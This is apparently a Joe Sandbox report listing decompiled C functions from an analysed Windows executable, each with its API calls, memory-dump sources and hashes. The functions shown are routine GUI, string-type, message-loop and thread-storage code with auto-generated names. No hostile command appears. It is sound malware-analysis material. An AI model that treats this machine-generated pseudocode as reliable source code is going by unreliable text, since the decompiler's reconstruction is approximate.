                                            				 *( *((intOrPtr*)(_t178 + 0x114)) + 8) = _t175;
                                            				_t97 = E004131DD(0x40);
                                            				 *(_t180 + 8) = _t97;
                                            				_t186 = _t97;
                                            				 *(_t180 - 4) = _t175;
                                            				if(_t97 == 0) {
                                            					_t98 = 0;
                                            					__eflags = 0;
                                            				} else {
                                            					_t98 = E00428A66(_t97, _t186);
                                            				}
                                            				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
                                            				 *((intOrPtr*)(_t178 + 0x74)) = _t98;
                                            				_t100 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf4))( *((intOrPtr*)(_t178 + 0x114)));
                                            				if(_t100 != 0) {
                                            					_t137 = _t178 + 0x78;
                                            					E00419BB7(_t137,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)));
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)), _t136);
                                            					 *( *((intOrPtr*)(_t178 + 0x74)) + 0xc) = _t175;
                                            					 *(_t178 + 0x84) = _t175;
                                            					 *((intOrPtr*)( *_t137 + 0x1c))();
                                            					_t110 = GetDC( *(_t178 + 0x1c));
                                            					 *(_t180 + 8) = _t110;
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x10))(_t110);
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf8))( *((intOrPtr*)(_t178 + 0x74)),  *((intOrPtr*)(_t178 + 0x114)));
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x18))();
                                            					ReleaseDC( *(_t178 + 0x1c),  *(_t180 + 8));
                                            					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
                                            					_t138 = _t178 + 0x80;
                                            					 *((intOrPtr*)(_t178 + 0x104)) = GetDeviceCaps( *_t138, 0x58);
                                            					 *((intOrPtr*)(_t178 + 0x108)) = GetDeviceCaps( *_t138, 0x5a);
                                            					_t122 =  *( *((intOrPtr*)(_t178 + 0x114)) + 0x18);
                                            					_t188 = _t122;
                                            					 *(_t178 + 0xf8) = _t122;
                                            					if(_t122 != 0) {
                                            						_t153 =  *(_t178 + 0xf0);
                                            						__eflags = _t122 - _t153;
                                            						if(__eflags > 0) {
                                            							 *(_t178 + 0xf8) = _t153;
                                            						}
                                            					} else {
                                            						 *(_t178 + 0xf8) = _t175;
                                            					}
                                            					 *(_t178 + 0xe8) =  *(_t178 + 0xf8);
                                            					_push(0x42e4b0);
                                            					_push(0x42e4b0);
                                            					_push(_t175);
                                            					_push(_t175);
                                            					_push(_t175);
                                            					E0041AE9C(_t178, _t188);
                                            					_t126 =  *((intOrPtr*)(_t178 + 0x114));
                                            					_t157 =  *((intOrPtr*)( *_t126 + 0x5c));
                                            					_t171 =  *((intOrPtr*)(_t157 + 0x1e));
                                            					if(_t171 >= 0x8000 || (_t171 & 0x0000ffff) - ( *(_t157 + 0x1c) & 0x0000ffff) > 0x7fff) {
                                            						ShowScrollBar( *(_t178 + 0x1c), _t175, 0);
                                            					} else {
                                            						 *((intOrPtr*)(_t180 - 0x24)) = 3;
                                            						 *(_t180 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1c) & 0x0000ffff;
                                            						 *(_t180 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1e) & 0x0000ffff;
                                            						 *(_t180 - 0x18) = _t175;
                                            						if(E00415006(_t178, _t175, _t180 - 0x28, 0) == 0) {
                                            							E00414F60(_t178, _t175,  *(_t180 - 0x20),  *(_t180 - 0x1c), 0);
                                            						}
                                            					}
                                            					E00427C71(_t178,  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)) + 0x14)), _t175);
                                            					_t100 = _t175;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
                                            				return _t100;
                                            			}


                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00426D8C
                                            • GetDC.USER32(?), ref: 00426E7B
                                            • ReleaseDC.USER32 ref: 00426EAF
                                            • GetDeviceCaps.GDI32(?,00000058), ref: 00426EC8
                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 00426ED8
                                              • Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829
                                            • ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,0042E4B0,0042E4B0), ref: 00426FA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CapsDeviceH_prolog$ReleaseScrollShow
                                            • String ID:
                                            • API String ID: 603669091-0
                                            • Opcode ID: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
                                            • Instruction ID: f5d210ee154f7f1b627b2ce3caee5c8d10a4320e645ae6f080698531d27b521b
                                            • Opcode Fuzzy Hash: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
                                            • Instruction Fuzzy Hash: E0716870600A00DFCB29DF68D984AAABBF5FF48310F51456EE56ACB3A1DB34E841CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0040A040(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
                                            				int _v8;
                                            				intOrPtr _v20;
                                            				short* _v28;
                                            				short _v32;
                                            				int _v36;
                                            				short* _v40;
                                            				void* _v56;
                                            				int _t31;
                                            				int _t32;
                                            				int _t37;
                                            				int _t43;
                                            				int _t44;
                                            				int _t45;
                                            				void* _t53;
                                            				short* _t60;
                                            				int _t61;
                                            				intOrPtr _t62;
                                            				short* _t63;
                                            
                                            				_push(0xffffffff);
                                            				_push(0x42f5e8);
                                            				_push(E00409800);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t62;
                                            				_t63 = _t62 - 0x18;
                                            				_v28 = _t63;
                                            				_t31 =  *0x439f04; // 0x1
                                            				if(_t31 != 0) {
                                            					L6:
                                            					if(_t31 != 2) {
                                            						if(_t31 != 1) {
                                            							goto L18;
                                            						} else {
                                            							if(_a20 == 0) {
                                            								_t44 =  *0x439efc; // 0x0
                                            								_a20 = _t44;
                                            							}
                                            							asm("sbb eax, eax");
                                            							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
                                            							_v36 = _t37;
                                            							if(_t37 == 0) {
                                            								goto L18;
                                            							} else {
                                            								_v8 = 0;
                                            								E00406830(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
                                            								_v28 = _t63;
                                            								_t60 = _t63;
                                            								_v40 = _t60;
                                            								E00406330(_t60, 0, _t37 + _t37);
                                            								_v8 = _v8 | 0xffffffff;
                                            								if(_t60 == 0) {
                                            									goto L18;
                                            								} else {
                                            									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
                                            									if(_t43 == 0) {
                                            										goto L18;
                                            									} else {
                                            										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
                                            									}
                                            								}
                                            							}
                                            						}
                                            					} else {
                                            						_t45 = _a24;
                                            						if(_t45 == 0) {
                                            							_t45 =  *0x439eec; // 0x0
                                            						}
                                            						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
                                            					}
                                            				} else {
                                            					_push( &_v32);
                                            					_t61 = 1;
                                            					if(GetStringTypeW(_t61, 0x42f5cc, _t61, ??) == 0) {
                                            						if(GetStringTypeA(0, _t61, 0x42f5c8, _t61,  &_v32) == 0) {
                                            							L18:
                                            							_t32 = 0;
                                            						} else {
                                            							_t31 = 2;
                                            							goto L5;
                                            						}
                                            					} else {
                                            						_t31 = _t61;
                                            						L5:
                                            						 *0x439f04 = _t31;
                                            						goto L6;
                                            					}
                                            				}
                                            				 *[fs:0x0] = _v20;
                                            				return _t32;
                                            			}


                                            APIs
                                            • GetStringTypeW.KERNEL32(00000001,0042F5CC,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A07F
                                            • GetStringTypeA.KERNEL32(00000000,00000001,0042F5C8,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A099
                                            • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A0CD
                                            • MultiByteToWideChar.KERNEL32(00406E03,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A105
                                            • MultiByteToWideChar.KERNEL32(00406E03,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A15B
                                            • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A16D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: StringType$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 3852931651-0
                                            • Opcode ID: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
                                            • Instruction ID: 7d97f644f5b15e7df2d58104b9ea96a21cdc8e77f8ddbf007f82d689378feb8c
                                            • Opcode Fuzzy Hash: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
                                            • Instruction Fuzzy Hash: 7B41A272600219BFCF219F54CC85EAF3F79EB08350F104536F911E6290D3398961CB9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00424DFE(intOrPtr __ecx, void* __esi) {
                                            				intOrPtr _t51;
                                            				void* _t53;
                                            				intOrPtr _t58;
                                            				signed int _t59;
                                            				signed int _t77;
                                            				intOrPtr _t84;
                                            				intOrPtr* _t86;
                                            				void* _t88;
                                            				CHAR** _t90;
                                            				void* _t91;
                                            
                                            				E00406520(E0042A538, _t91);
                                            				_t84 = __ecx;
                                            				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
                                            				_t51 = E00424F37(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
                                            				if(_t51 == 0) {
                                            					L19:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                                            					return _t51;
                                            				}
                                            				_t97 =  *((intOrPtr*)(_t91 + 8));
                                            				 *((intOrPtr*)(_t91 - 0x18)) = 1;
                                            				if( *((intOrPtr*)(_t91 + 8)) == 0) {
                                            					L18:
                                            					E0042500B(_t84, 1, 1);
                                            					_t51 =  *((intOrPtr*)(_t91 - 0x18));
                                            					goto L19;
                                            				}
                                            				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
                                            				_push(0);
                                            				_t88 = _t53;
                                            				E0041A369(_t91 - 0x38, _t97);
                                            				 *(_t91 - 4) = 0;
                                            				 *(_t91 - 0x14) = 0;
                                            				if(_t88 != 0) {
                                            					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
                                            				}
                                            				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
                                            				 *(_t91 - 0x10) = 0;
                                            				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
                                            					L15:
                                            					if( *(_t91 - 0x14) != 0) {
                                            						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
                                            					}
                                            					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
                                            					E0041A3DB(_t91 - 0x38);
                                            					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
                                            					goto L18;
                                            				} else {
                                            					_t14 = _t86 + 0x10; // 0x10
                                            					_t90 = _t14;
                                            					do {
                                            						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
                                            						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                            						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
                                            						_t100 = _t58;
                                            						 *_t86 = _t58;
                                            						if(_t58 == 0) {
                                            							_t59 = GetSystemMetrics(0);
                                            							asm("cdq");
                                            							_t77 = 4;
                                            							__eflags =  *(_t91 - 0x10);
                                            							 *(_t90 - 0xc) = _t59 / _t77;
                                            							if(__eflags == 0) {
                                            								_t33 = _t90 - 8;
                                            								 *_t33 =  *(_t90 - 8) | 0x08000100;
                                            								__eflags =  *_t33;
                                            							}
                                            							goto L12;
                                            						}
                                            						if(E00417214(_t90, _t100, _t58) == 0) {
                                            							L14:
                                            							 *((intOrPtr*)(_t91 - 0x18)) = 0;
                                            							goto L15;
                                            						}
                                            						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
                                            						 *(_t90 - 0xc) =  *(_t91 - 0x24);
                                            						_push(0);
                                            						_push( *_t90);
                                            						_push( *(_t91 - 0x10));
                                            						if(E0041BD0A( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
                                            							goto L14;
                                            						}
                                            						L12:
                                            						_t86 = _t86 + 0x14;
                                            						_t90 =  &(_t90[5]);
                                            						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
                                            					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
                                            					goto L15;
                                            				}
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00424E03
                                            • SendMessageA.USER32(0000E800,00000031,00000000,00000000), ref: 00424E3E
                                              • Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
                                              • Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397
                                            • SelectObject.GDI32(?,00000000), ref: 00424E5D
                                            • GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00424EA5
                                            • GetSystemMetrics.USER32 ref: 00424EC7
                                            • SelectObject.GDI32(?,?), ref: 00424F04
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
                                            • String ID:
                                            • API String ID: 3673216194-0
                                            • Opcode ID: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
                                            • Instruction ID: de80a065bd08caa13eaac1d81a7ee75adb8ed78cffc769f96184ddddc36f8564
                                            • Opcode Fuzzy Hash: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
                                            • Instruction Fuzzy Hash: 2D419D71A00219EFDB20DF95E8859AEFBB5FF88344F91402AF911A3250C7749A41CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E00420341(void* __ecx, intOrPtr __edx) {
                                            				intOrPtr _v8;
                                            				struct tagMSG _v32;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t31;
                                            				void* _t33;
                                            				void* _t35;
                                            				void* _t37;
                                            				intOrPtr* _t38;
                                            				void* _t42;
                                            				void* _t44;
                                            				intOrPtr _t55;
                                            				void* _t56;
                                            				void* _t57;
                                            				void* _t59;
                                            				void* _t60;
                                            				void* _t61;
                                            				intOrPtr* _t62;
                                            
                                            				_t58 = __edx;
                                            				_t59 = GetCapture;
                                            				_t60 = __ecx;
                                            				if(GetCapture() != 0) {
                                            					L20:
                                            					return 0;
                                            				}
                                            				E00413740(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
                                            				if(E00413740(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
                                            					L19:
                                            					E00420031(_t60, _t72);
                                            					goto L20;
                                            				} else {
                                            					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                            						_t31 = _v32.message - 0x100;
                                            						if(_t31 == 0) {
                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                            							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
                                            								E0041FA60(_t60, _v32.wParam, 1);
                                            							}
                                            							__eflags = _v32.wParam - 0x1b;
                                            							if(__eflags != 0) {
                                            								L18:
                                            								_t33 = E00413740(_t61, GetCapture());
                                            								_t72 = _t33 -  *((intOrPtr*)(_t60 + 0x68));
                                            								if(_t33 ==  *((intOrPtr*)(_t60 + 0x68))) {
                                            									continue;
                                            								}
                                            							}
                                            							goto L19;
                                            						}
                                            						_t35 = _t31 - 1;
                                            						if(_t35 == 0) {
                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                            							if(__eflags != 0) {
                                            								E0041FA60(_t60, _v32.wParam, 0);
                                            							}
                                            							goto L18;
                                            						}
                                            						_t37 = _t35 - 0xff;
                                            						if(_t37 == 0) {
                                            							_t55 = _v32.pt;
                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                            							_t58 = _v8;
                                            							_push(_t55);
                                            							_push(_t55);
                                            							_t38 = _t62;
                                            							 *_t38 = _t55;
                                            							 *((intOrPtr*)(_t38 + 4)) = _v8;
                                            							_t56 = _t60;
                                            							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
                                            								E0041FCEC(_t56, _t59);
                                            							} else {
                                            								E0041F9E4(_t56);
                                            							}
                                            							goto L18;
                                            						}
                                            						_t42 = _t37;
                                            						if(_t42 == 0) {
                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                            							_t57 = _t60;
                                            							if(__eflags == 0) {
                                            								E0041FE54(_t61, __eflags);
                                            							} else {
                                            								E0041FA94(_t57, _t58, _t59, _t60, __eflags);
                                            							}
                                            							_t44 = 1;
                                            							return _t44;
                                            						}
                                            						if(_t42 == 0) {
                                            							goto L19;
                                            						}
                                            						DispatchMessageA( &_v32);
                                            						goto L18;
                                            					}
                                            					E00429977(_v32.wParam);
                                            					goto L19;
                                            				}
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Capture$Message$Dispatch
                                            • String ID:
                                            • API String ID: 3654672037-0
                                            • Opcode ID: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
                                            • Instruction ID: 30569a75dd2c4bd339c842e90f3a76f558b8e988fa3a176c692722e66ec8e41b
                                            • Opcode Fuzzy Hash: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
                                            • Instruction Fuzzy Hash: 103197717002299BDB21BBA5A8459AFB7E8EF40345FD0C43FA505D2253CE3C9C82D769
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E00425A9A(long* __ecx, signed int _a4, intOrPtr _a8) {
                                            				void* _v8;
                                            				void* __ebp;
                                            				void* _t28;
                                            				void* _t32;
                                            				void* _t33;
                                            				void* _t39;
                                            				signed int* _t45;
                                            				void* _t58;
                                            				long* _t61;
                                            
                                            				_push(__ecx);
                                            				_t61 = __ecx;
                                            				_t58 = TlsGetValue( *__ecx);
                                            				if(_t58 == 0) {
                                            					_t28 = E00425860(0x10);
                                            					if(_t28 == 0) {
                                            						_t58 = 0;
                                            					} else {
                                            						 *_t28 = 0x42e2ac;
                                            						_t58 = _t28;
                                            					}
                                            					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
                                            					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
                                            					_t8 = _t58 + 8; // 0x8
                                            					_t45 = _t8;
                                            					_t9 =  &(_t61[7]); // 0x4399c8
                                            					_v8 = _t58;
                                            					EnterCriticalSection(_t9);
                                            					_t11 =  &(_t61[5]); // 0x4399c0
                                            					_t48 = _t11;
                                            					E00425807(_t11, _t58);
                                            					_t12 =  &(_t61[7]); // 0x4399c8
                                            					LeaveCriticalSection(_t12);
                                            					goto L8;
                                            				} else {
                                            					_t2 = _t58 + 8; // 0x8
                                            					_t45 = _t2;
                                            					if(_a4 >=  *_t45 && _a8 != 0) {
                                            						L8:
                                            						_t32 =  *(_t58 + 0xc);
                                            						if(_t32 != 0) {
                                            							_t15 =  &(_t61[3]); // 0x4
                                            							_t48 =  *_t15 << 2;
                                            							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
                                            						} else {
                                            							_t14 =  &(_t61[3]); // 0x4
                                            							_t33 = LocalAlloc(0,  *_t14 << 2);
                                            						}
                                            						 *(_t58 + 0xc) = _t33;
                                            						if(_t33 == 0) {
                                            							E0041007F(_t48);
                                            						}
                                            						_t17 =  &(_t61[3]); // 0x4
                                            						E00406330( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
                                            						_t21 =  &(_t61[3]); // 0x4
                                            						 *_t45 =  *_t21;
                                            						TlsSetValue( *_t61, _t58);
                                            					}
                                            				}
                                            				_t39 =  *(_t58 + 0xc);
                                            				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
                                            				return _t39;
                                            			}

                                            APIs
                                            • TlsGetValue.KERNEL32(004399AC,004397CC,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AA5
                                            • EnterCriticalSection.KERNEL32(004399C8,00000010,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AF4
                                            • LeaveCriticalSection.KERNEL32(004399C8,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B07
                                            • LocalAlloc.KERNEL32(00000000,00000004,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B1D
                                            • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B2F
                                            • TlsSetValue.KERNEL32(004399AC,00000000), ref: 00425B6B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                            • String ID:
                                            • API String ID: 4117633390-0
                                            • Opcode ID: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
                                            • Instruction ID: c57f163ce3b349da1c9d5fe6ec490a1136d0d73abae7d2378efdd78ccfe309f5
                                            • Opcode Fuzzy Hash: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
                                            • Instruction Fuzzy Hash: 96318031200A15EFD724DF15E88AE6AB7B8FF44354F80C66AE416C7650E774F815CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0041445E(intOrPtr* __ecx, void* __edi) {
                                            				struct HWND__* _t33;
                                            				int _t35;
                                            				void* _t37;
                                            				void* _t52;
                                            				void* _t53;
                                            				intOrPtr* _t57;
                                            				void* _t58;
                                            				void* _t60;
                                            
                                            				_t53 = __edi;
                                            				E00406520(E00429E3C, _t60);
                                            				_push(__ecx);
                                            				_t57 = __ecx;
                                            				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E00424BFB() + 4));
                                            				E00424BFB();
                                            				E00412F19();
                                            				 *(_t60 - 4) = 0;
                                            				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
                                            					 *((intOrPtr*)( *_t57 + 0xf0))();
                                            				}
                                            				_push(_t53);
                                            				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
                                            				E00414E86(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
                                            				_t48 = _t57;
                                            				_t58 = E00414CEF(_t57);
                                            				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
                                            				E00414E86(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
                                            				_t33 = GetCapture();
                                            				if(_t33 != 0) {
                                            					SendMessageA(_t33, 0x1f, 0, 0);
                                            				}
                                            				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
                                            				_t65 = _t35;
                                            				if(_t35 == 0) {
                                            					_push(0xffffffff);
                                            					_push(0);
                                            					_push(0xf107);
                                            					E0041BB7E(_t48, _t65);
                                            				}
                                            				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
                                            				E00424BFB();
                                            				_t37 = E00412F2E();
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
                                            				return _t37;
                                            			}












                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00414463
                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004144B0
                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004144D2
                                            • GetCapture.USER32 ref: 004144E4
                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004144F3
                                            • WinHelpA.USER32 ref: 00414507
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageSend$CaptureH_prologHelp
                                            • String ID:
                                            • API String ID: 432264411-0
                                            • Opcode ID: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
                                            • Instruction ID: 80e039248a87347babf29178317820bee1b7ca75e73936699edc63578028a574
                                            • Opcode Fuzzy Hash: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
                                            • Instruction Fuzzy Hash: 15219571300205BFEB20AF65DC89FAA7BA9FF44754F118129F245971E2CBB4DC419B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004232C5(intOrPtr _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16, struct HBRUSH__* _a20) {
                                            				struct tagRECT _v20;
                                            				struct HBRUSH__* _t46;
                                            				long _t50;
                                            				struct HBRUSH__* _t52;
                                            				intOrPtr _t59;
